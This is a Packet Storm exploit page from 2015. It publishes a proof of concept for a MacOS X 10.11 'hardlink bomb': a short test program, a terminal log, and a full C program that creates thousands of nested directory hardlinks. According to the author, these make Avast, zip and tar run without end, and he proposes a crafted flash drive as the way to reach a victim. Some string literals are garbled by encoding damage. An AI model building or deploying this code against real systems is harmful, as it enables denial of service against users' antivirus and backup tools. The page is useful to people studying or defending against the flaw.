exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MacOS X 10.11 Hardlink Resource Exhaustion

MacOS X 10.11 Hardlink Resource Exhaustion
Posted Oct 26, 2015
Authored by Maksymilian Arciemowicz

MacOS X 10.11 suffers from a hardlink bomb issue that causes resource exhaustion.

tags | exploit, denial of service
advisories | CVE-2010-0105, CVE-2013-6799, CVE-2014-4433, CVE-2014-4434
SHA-256 | 4058ea8977e433e0872ba59dabcc96a98e1a41577ee9392d7c6db485784a1396

MacOS X 10.11 Hardlink Resource Exhaustion

Change Mirror Download
/*

MacOS X 10.11 hardlink bomb cause resource exhaustion (Avast PoC)
Credit: Maksymilian Arciemowicz ( CXSECURITY )
Website:
http://cxsecurity.com/
http://cert.cx/


Affected software:
- Commands such as: zip, tar, find
- AntiVirus: Avast, Eset32

Let's back to an old bug, which Apple does not patch until today.

https://cxsecurity.com/issue/WLB-2013110059
----------------------------------------------
mac-cxs-XK:pochd XK$ cat test.c
#include <stdio.h>
#include <unistd.h>

void usage(const char* program)
{
const char* message = " [src_dir] [target_dir]";
fprintf(stderr, "%s%sn", program, message);
}

int main(int argc, char* argv[]) {
if (argc!=3) {
usage(argv[0]);
return 1;
}

int ret = link(argv[1],argv[2]);

fprintf(stderr,"link(3) return= %dn", ret);

return ret;
}

mac-cxs-XK:pochd XK$ gcc -o test test.c
mac-cxs-XK:pochd XK$ ls
test test.c
mac-cxs-XK:pochd XK$ mkdir DIR1
mac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1
link(3) return= -1
mac-cxs-XK:pochd XK$ mkdir DIR1/DIR2
mac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2
link(3) return= 0
mac-cxs-XK:pochd XK$ cd DIR1
mac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3
mac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3
link(3) return= 0
mac-cxs-XK:DIR1 XK$ cd DIR2
mac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4
mac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4
link(3) return= -1
----------------------------------------------

As we see is possible to create hardlink with some limitations. In presented PoC just two hardlinks were created what show that this possibility still exists and is in opposition to wikipedia's facts

https://en.wikipedia.org/wiki/Hard_link

---
UNIX System V allowed them, but only the superuser had permission to make such links.[5] Mac OS X v10.5 (Leopard) and newer use hard links on directories for the Time Machine backup mechanism only. Symbolic links and NTFS junction points are generally used instead for this purpose.
---

Maybe ‘Time Machine’ uses the same function 'link()' which Apple can't patch? I don't know but two hardlinks aren't threat for stability dissimilarly to 8192. The following program allows you to create N directories (default=1024) with 8 hardlinks on each level e.g. 1024 directories and 8192 hardlinks.

For many programs special crafted file system, can be very difficult to handle. Two examples of groups of tools, which have this weakness: AV Tools and software for archiving.

An example of a vector of attack for the AV tool is an external flash drive. If attacker create special crafted flash drive and victim will decide to scan this drive by using Avast, scanning will not end in normal time. After twenty hours of external media scanning 0% of progress so I decided to discontinue further scanning. Nevertheless Avast fell into the CPU exhaustion, which could not be stopped. On subsequent attempts of any scan Avast returned an error 7012.


Archiving Tools zip(1), tar(1) also have problem with compressing 1024 directories and 8192 hardlinks.

# zip -R packme.zip B
Scanning files ................

and no end in sight.

after six hours I decided to stop further compressing. Other tools for data backup may not deal with such file system.
BTW: don't try use ln(1) command. ☺ To create hardlink on MacOSX you need use link(3) function used in the following PoC


====== References ===================================
https://cxsecurity.com/issue/WLB-2015100149
https://cxsecurity.com/issue/WLB-2014040027
https://cxsecurity.com/cveshow/CVE-2014-4433/
https://cxsecurity.com/cveshow/CVE-2014-4434/
https://cxsecurity.com/issue/WLB-2013110059
https://cxsecurity.com/cveshow/CVE-2013-6799/
https://cxsecurity.com/issue/WLB-2010040284
https://cxsecurity.com/cveshow/CVE-2010-0105/
https://cxsecurity.com/issue/WLB-2005090063
http://en.wikipedia.org/wiki/Hard_link


====== Thanks ===================================
Kacper and Smash_ from DEVILTEAM for technical support.


====== Credit ===================================
Maksymilian Arciemowicz from cxsecurity.com

http://cxsecurity.com/
http://cert.cx/
http://cifrex.org/


*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>
#include <errno.h>
#include <locale.h>

int mkpath(char *path, mode_t mode, mode_t dir_mode){

struct stat sb;
char *slash;
int done,rv;

done=0;
slash=path;

for(;;){
slash += strspn(slash,"/");
slash += strcspn(slash,"/");

done = (*slash=='�');
*slash = '�';

rv = mkdir(path, done ? mode : dir_mode);

if(rv < 0){
int sverrno;

sverrno = errno;

if(stat(path,&sb)<0){
errno=sverrno;
warn("%s",path);
return -1;
}

if(!S_ISDIR(sb.st_mode)){
errno = ENOTDIR;
warn("%s",path);
return -1;
}
} else if (done){
if((chmod(path,mode)== -1)) {
warn("%s",path);
return -1;
}
}

if(done){
break;
}

*slash = '/';
}

return 0;
}

int main(int argc, char *argv[]){

if(argc!=2){
printf("Use it with (int)arg[1]. E.g. 8192n");
return 1;
}

int wbita=atoi(argv[1]);

const char symn1[]="X1�", symn2[]="X2�", symn3[]="X3�", symn4[]="X4�";
const char symn5[]="X5�", symn6[]="X6�", symn7[]="X7�", symn8[]="X8�";
char buff[]="B�", cd[]="..�";
char sym[]="B/B�";
FILE *fp;

int level=0;
mode_t mode = ((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0));
mode_t dir_mode = mode | S_IWUSR |S_IXUSR;

mkpath(buff,mode,dir_mode);

// Step 0
while(1)
if(0!=chdir(buff)){
printf("Phase 0 donen");
break;
}
else printf("cd to already created dir on level: %in",level++);

// Step 1
for(int ax=level; ax<wbita; ax++){
mkpath(buff,mode,dir_mode);

printf("Directory created. Progress (%i/%i)n",(ax+1), wbita);

if(0!=chdir(buff)){
printf("Error. chdir() failed.");
break;
}
}

// Step 2
mkpath(buff,mode,dir_mode);
chdir(buff);
mkpath(buff,mode,dir_mode);
chdir(cd);

// Step 3
for(int ax=level; ax<wbita; ax++){
printf("=======================ncd .. and HLs. Progress: (%i/%i) [be patient. latency may occur]n",(ax+1),wbita);
printf("Link1(%s,%s)=%i;n",sym,symn1,link(sym,symn1));
printf("Link2(%s,%s)=%i;n",sym,symn2,link(sym,symn2));
printf("Link3(%s,%s)=%i;n",sym,symn3,link(sym,symn3));
printf("Link4(%s,%s)=%i;n",sym,symn4,link(sym,symn4));
printf("Link5(%s,%s)=%i;n",sym,symn5,link(sym,symn5));
printf("Link6(%s,%s)=%i;n",sym,symn6,link(sym,symn6));
printf("Link7(%s,%s)=%i;n",sym,symn7,link(sym,symn7));
printf("Link8(%s,%s)=%i;n",sym,symn8,link(sym,symn8));

if(0!=chdir(cd)){
printf("Error. chdir failed!");
break;
}

}
return 0;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close